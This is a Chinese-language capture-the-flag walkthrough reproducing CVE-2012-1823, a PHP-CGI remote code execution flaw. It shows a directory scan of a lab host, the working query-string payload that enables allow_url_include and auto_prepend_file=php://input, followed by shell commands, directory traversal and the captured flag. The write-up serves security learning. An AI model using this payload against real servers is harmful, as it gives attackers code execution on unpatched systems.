漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

关于CGI知识点
CGI模式下的参数:

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

题目如下图,没有什么发现


目录扫描一下

dirsearch -u http://47.96.234.169:32349/


发现info.php,直接访问/info.php

可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823
参考博客[https://blog.csdn.net/qq_36374896/article/details/84102239?spm=1001.2014.3001.5506]
然后我们使用burp抓包,便于观察回显

  1. 首先我们使用-s命令查看一下源代码

    可以准确得到源码<?php phpinfo();
  2. 接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input #payload

#post请求内容


可以看到当前用户的名称为“www-data”
3. 然后我们使用ls命令列一下目录

得到index.php和info.php,使用cat命令查看一下index.php

提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下

ls ../../../


发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}
cat ../../../flag

热门相关:林氏荣华   许你盛世安宁   重生之悠然人生   永恒王权   越境鬼医